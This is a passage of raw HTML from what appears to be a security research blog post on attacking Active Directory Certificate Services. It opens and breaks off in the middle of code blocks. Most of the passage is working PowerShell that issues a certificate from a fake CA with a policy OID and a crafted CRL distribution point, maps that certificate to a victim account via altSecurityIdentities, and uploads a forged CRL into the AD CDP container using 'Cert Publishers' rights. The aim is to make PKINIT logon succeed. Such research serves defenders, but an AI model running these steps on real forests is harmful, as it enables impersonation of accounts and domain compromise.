#24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;D948F2E5585FD3C7802263DAED9722E67315FA02&quot;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Crl.SignerCertificate <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $signer<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Crl.Encode()<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">[<\/span><span style=\"color: #D32F2F\">System.IO.File<\/span><span style=\"color: #24292EFF\">]::WriteAllBytes(<\/span><span style=\"color: #22863A\">&quot;fakeca.crl&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> [<\/span><span 
style=\"color: #D32F2F\">System.Convert<\/span><span style=\"color: #24292EFF\">]::FromBase64String($Crl.RawData()))<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>So the next step would be to publish the signed CRL for our fake CA somewhere &#8211; we could just host a web server and include its URL as the CDP in a newly issued leaf certificate. It would look something like this:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">Issue certificate with AMA extension and HTTP CDP<\/span><span role=\"button\" tabindex=\"0\" data-code=\"$AmaExtension = New-CertificatePoliciesExtension -Oid &quot;1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402&quot;\n\n$CRLDistInfo = [CERTENClib.CCertEncodeCRLDistInfoClass]::new()\n$CRLDistInfo.Reset(1)\n$CRLDistInfo.SetNameCount(0, 1)\n$CRLDistInfo.SetNameEntry(0, 0, 7, &quot;http:\/\/192.168.1.1\/cdp\/fakeca.crl&quot;)\n$CRLDistInfoB64 = $CRLDistInfo.EncodeBlob([CERTENClib.EncodingType]::XCN_CRYPT_STRING_BASE64)\n$CRLDistInfoExtManaged = [System.Security.Cryptography.X509Certificates.X509Extension]::new(&quot;2.5.29.31&quot;, [Convert]::FromBase64String($CRLDistInfoB64), $false)\n\n $params = @{\n    Type = 'Custom'\n    Subject = 'CN=DEMO5 - fakecaso2'\n    #KeySpec = 'Signature'\n    KeyExportPolicy = 'Exportable'\n    KeyLength = 2048\n    HashAlgorithm = 'sha256'\n    NotAfter = (Get-Date).AddMonths(10)\n    CertStoreLocation = 'Cert:\\CurrentUser\\My'\n    Signer = $signer\n    TextExtension = @(\n     '2.5.29.37={text}1.3.6.1.5.5.7.3.2',\n     
'2.5.29.17={text}upn=caso@nttest.chrisse.com')\n    Extension =  $CRLDistInfoExtManaged, $AmaExtension\n}\nNew-SelfSignedCertificate @params\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #24292EFF\">$AmaExtension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #6F42C1\">New-CertificatePoliciesExtension<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Oid <\/span><span style=\"color: #22863A\">&quot;1.3.6.1.4.1.311.21.8.10665564.8181582.1918139.271632.11328427.90.1.402&quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfo <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">CERTENClib.CCertEncodeCRLDistInfoClass<\/span><span style=\"color: #24292EFF\">]::new()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfo.Reset(<\/span><span style=\"color: #1976D2\">1<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: 
#24292EFF\">$CRLDistInfo.SetNameCount(<\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">1<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfo.SetNameEntry(<\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">7<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;http:\/\/192.168.1.1\/cdp\/fakeca.crl&quot;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfoB64 <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $CRLDistInfo.EncodeBlob([<\/span><span style=\"color: #D32F2F\">CERTENClib.EncodingType<\/span><span style=\"color: #24292EFF\">]::XCN_CRYPT_STRING_BASE64)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CRLDistInfoExtManaged <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">System.Security.Cryptography.X509Certificates.X509Extension<\/span><span style=\"color: #24292EFF\">]::new(<\/span><span style=\"color: #22863A\">&quot;2.5.29.31&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">Convert<\/span><span style=\"color: #24292EFF\">]::FromBase64String($CRLDistInfoB64)<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">$false<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span 
style=\"color: #24292EFF\"> $params <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">@<\/span><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Type <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;Custom&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Subject <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;CN=DEMO5 - fakecaso2&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    <\/span><span style=\"color: #C2C3C5\">#KeySpec = &#39;Signature&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    KeyExportPolicy <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;Exportable&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    KeyLength <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">2048<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    HashAlgorithm <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&#39;sha256&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    NotAfter <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> (<\/span><span style=\"color: #6F42C1\">Get-Date<\/span><span style=\"color: #24292EFF\">).AddMonths(<\/span><span style=\"color: #1976D2\">10<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    CertStoreLocation <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> 
<\/span><span style=\"color: #22863A\">&#39;Cert:\\CurrentUser\\My&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Signer <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $signer<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    TextExtension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">@<\/span><span style=\"color: #24292EFF\">(<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">     <\/span><span style=\"color: #22863A\">&#39;2.5.29.37={text}1.3.6.1.5.5.7.3.2&#39;<\/span><span style=\"color: #D32F2F\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">     <\/span><span style=\"color: #22863A\">&#39;2.5.29.17={text}upn=caso@nttest.chrisse.com&#39;<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">    Extension <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\">  $CRLDistInfoExtManaged<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> $AmaExtension<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #6F42C1\">New-SelfSignedCertificate<\/span><span style=\"color: #24292EFF\"> @params<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Find any user within the forest where you can write to the &#8216;altSecurityIdentities&#8217; attribute<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 
16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">Set-AltSecurityIdentities<\/span><span role=\"button\" tabindex=\"0\" data-code=\"$cert  = ls Cert:\\CurrentUser\\my | where { $_.subject -eq &quot;CN=DEMO5 - fakecaso2&quot; }\n.\\Set-AltSecurityIdentities.ps1 -Identity CASO -MappingType IssuerSerialNumber -Certificate $cert\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #24292EFF\">$cert  <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> ls Cert:\\CurrentUser\\my <\/span><span style=\"color: #D32F2F\">|<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">where<\/span><span style=\"color: #24292EFF\"> { <\/span><span style=\"color: #1976D2\">$_.subject<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-eq<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;CN=DEMO5 - fakecaso2&quot;<\/span><span style=\"color: #24292EFF\"> }<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">.<\/span><span style=\"color: #6F42C1\">\\Set-AltSecurityIdentities.ps1<\/span><span style=\"color: #24292EFF\"> 
<\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Identity CASO <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">MappingType IssuerSerialNumber <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">Certificate $cert<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>But what if the Domain Controllers (DCs) \/ Key Distribution Centers (KDCs) block outgoing HTTP traffic to arbitrary destinations &#8211; which they should? The KDC then cannot retrieve our CRL, its revocation check of the client certificate during PKINIT fails, and so does the logon.<\/p>\n\n\n\n<p>But what they can&#8217;t block is LDAP access to themselves, right? \ud83d\ude42 So let&#8217;s go for an LDAP CDP instead &#8211; but wait, the only privilege we hold is &#8216;Cert Publishers&#8217; membership, obtained through the SYSTEM context of &#8216;Issuing CA 2&#8217; &#8211; it turns out that might be a problem.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"633\" src=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/ldpCDP-1024x633.png\" alt=\"\" class=\"wp-image-1256\" srcset=\"https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/ldpCDP-1024x633.png 1024w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/ldpCDP-300x185.png 300w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/ldpCDP-768x475.png 768w, https:\/\/blog.chrisse.se\/wp-content\/uploads\/2025\/03\/ldpCDP.png 1414w\" sizes=\"auto, (max-width: 767px) 89vw, (max-width: 1000px) 54vw, (max-width: 1071px) 543px, 580px\" \/><\/figure>\n\n\n\n<p>It turns out that &#8216;Cert Publishers&#8217; has Full Control on the sub-container created under &#8216;CN=CDP&#8217; as part of every Enterprise CA installation, so let&#8217;s use that \ud83d\ude42<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" 
style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#2f363c\">Upload CRL signed by FakeCA to AD<\/span><span role=\"button\" tabindex=\"0\" data-code=\"using namespace System.DirectoryServices.Protocols\n\n$Assembly = &quot;System.DirectoryServices.Protocols&quot;\nTry\n{\nAdd-Type -AssemblyName $Assembly -ErrorAction Stop\n}\nCatch\n{\n\nthrow\n}\n# Connect to $ForestDomainName\n$Identifier = [LdapDirectoryIdentifier]::new($ForestDomainName, 389, $false, $false)\n$Ldap = [LdapConnection]::new($Identifier, $null, [AuthType]::Kerberos)\n$Ldap.AutoBind = $false\n$Ldap.ClientCertificates.Clear()\n$SessionOptions = $Ldap.SessionOptions\n$SessionOptions.LocatorFlag = [LocatorFlags]::WriteableRequired -bor [LocatorFlags]::DirectoryServicesRequired -bor [LocatorFlags]::ForceRediscovery\n$SessionOptions.Signing = $true\n$SessionOptions.Sealing = $true\n$SessionOptions.ProtocolVersion = 3\n$SessionOptions.ReferralChasing = [ReferralChasingOptions]::None\n\nTry\n{\n$Ldap.Bind()\n}\nCatch\n{\n\nthrow\n}\n\n# Get configurationNamingContext\n$ConfigNamingContext = &quot;configurationNamingContext&quot;\n\n$RootDseSearchRequest = [SearchRequest]::new([String]::Empty, &quot;(&amp;(objectClass=*))&quot;, [SearchScope]::Base, $ConfigNamingContext)\nTry\n{\n$RootDseSearchResponse = [SearchResponse]$Ldap.SendRequest($RootDseSearchRequest)\n}\nCatch\n{\n\nthrow\n}\nIf ($RootDseSearchResponse.Entries.Count -eq 0)\n{\n\nthrow\n}\n$RootDse = $RootDseSearchResponse.Entries[0]\n\nIf (!$RootDse.Attributes.Contains($ConfigNamingContext))\n{\n\nthrow\n}\n$CDPLocation = &quot;&quot;\n$CASubject = &quot;CN=Chrisse Root CA&quot;\n$Configuration = $RootDse.Attributes[$ConfigNamingContext][0]\n\n$searchRequest 
= [SearchRequest]::new([String]::Format(&quot;CN=CDP,CN=Public Key Services,CN=Services,{0}&quot;, $Configuration), &quot;(objectClass=cRLDistributionPoint)&quot;, [SearchScope]::Subtree, &quot;objectClass&quot;)\n\n$searchResponse = $ldap.SendRequest($searchRequest);\n\nif ($searchResponse.Entries.Count -eq 0)\n{\nthrow\n}\nforeach($entry in $searchResponse.Entries)\n{\nif($entry.DistinguishedName.StartsWith($CASubject, [System.StringComparison]::CurrentCultureIgnoreCase))\n{\n$CDPContainer = $entry.DistinguishedName.IndexOf(',') +1\n$CDPLocation = $entry.DistinguishedName.Substring($CDPContainer)\n}\n}\n\nif ($CDPLocation -eq &quot;&quot;)\n{\n$CDPContainer = $searchResponse.Entries[0].DistinguishedName.IndexOf(',') +1\n$CDPLocation = $searchResponse.Entries[0].DistinguishedName.Substring($CDPContainer)\n}\n\n#Load the CRL created and signed earlier from file\n$CrlBytes = [System.IO.File]::ReadAllBytes(&quot;fakeca.crl&quot;)\n\n$addRequest = [AddRequest]::new([String]::Format(&quot;$CASubject,{0}&quot;, $CDPLocation),\n\n[DirectoryAttribute]::new(&quot;objectClass&quot;, &quot;cRLDistributionPoint&quot;),\n[DirectoryAttribute]::new(&quot;certificateRevocationList&quot;,$CrlBytes)\n\n)\n$addResponse = $ldap.SendRequest($addRequest)\" style=\"color:#24292eff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki 
min-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #D32F2F\">using<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">namespace<\/span><span style=\"color: #24292EFF\"> System.DirectoryServices.Protocols<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Assembly <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;System.DirectoryServices.Protocols&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">Try<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #6F42C1\">Add-Type<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">AssemblyName $Assembly <\/span><span style=\"color: #D32F2F\">-<\/span><span style=\"color: #24292EFF\">ErrorAction Stop<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">Catch<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">throw<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #C2C3C5\"># Connect to $ForestDomainName<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Identifier <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">LdapDirectoryIdentifier<\/span><span style=\"color: #24292EFF\">]::new($ForestDomainName<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">389<\/span><span style=\"color: 
#D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">$false<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">$false<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Ldap <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">LdapConnection<\/span><span style=\"color: #24292EFF\">]::new($Identifier<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">$null<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">AuthType<\/span><span style=\"color: #24292EFF\">]::Kerberos)<\/span><\/span>\n<span class=\"line cbp-see-more-line \"><span style=\"color: #24292EFF\">$Ldap.AutoBind <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">$false<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Ldap.ClientCertificates.Clear()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$SessionOptions <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $Ldap.SessionOptions<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$SessionOptions.LocatorFlag <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">LocatorFlags<\/span><span style=\"color: #24292EFF\">]::WriteableRequired <\/span><span style=\"color: #D32F2F\">-bor<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">LocatorFlags<\/span><span style=\"color: #24292EFF\">]::DirectoryServicesRequired <\/span><span style=\"color: #D32F2F\">-bor<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: 
#D32F2F\">LocatorFlags<\/span><span style=\"color: #24292EFF\">]::ForceRediscovery<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$SessionOptions.Signing <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">$true<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$SessionOptions.Sealing <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">$true<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$SessionOptions.ProtocolVersion <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">3<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$SessionOptions.ReferralChasing <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">ReferralChasingOptions<\/span><span style=\"color: #24292EFF\">]::None<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">Try<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$Ldap.Bind()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">Catch<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">throw<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #C2C3C5\"># Get configurationNamingContext<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$ConfigNamingContext <\/span><span style=\"color: #D32F2F\">=<\/span><span 
style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;configurationNamingContext&quot;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$RootDseSearchRequest <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">SearchRequest<\/span><span style=\"color: #24292EFF\">]::new([<\/span><span style=\"color: #D32F2F\">String<\/span><span style=\"color: #24292EFF\">]::Empty<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;(&amp;(objectClass=*))&quot;<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">SearchScope<\/span><span style=\"color: #24292EFF\">]::Base<\/span><span style=\"color: #D32F2F\">,<\/span><span style=\"color: #24292EFF\"> $ConfigNamingContext)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">Try<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$RootDseSearchResponse <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> [<\/span><span style=\"color: #D32F2F\">SearchResponse<\/span><span style=\"color: #24292EFF\">]$Ldap.SendRequest($RootDseSearchRequest)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">Catch<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">throw<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">If<\/span><span style=\"color: #24292EFF\"> ($RootDseSearchResponse.Entries.Count <\/span><span style=\"color: 
#D32F2F\">-eq<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #24292EFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">throw<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$RootDse <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> $RootDseSearchResponse.Entries[<\/span><span style=\"color: #1976D2\">0<\/span><span style=\"color: #24292EFF\">]<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">If<\/span><span style=\"color: #24292EFF\"> (<\/span><span style=\"color: #D32F2F\">!<\/span><span style=\"color: #24292EFF\">$RootDse.Attributes.Contains($ConfigNamingContext))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">{<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D32F2F\">throw<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CDPLocation <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: #22863A\">&quot;&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #24292EFF\">$CASubject <\/span><span style=\"color: #D32F2F\">=<\/span><span style=\"color: #24292EFF\"> <\/span><span style=\"color: 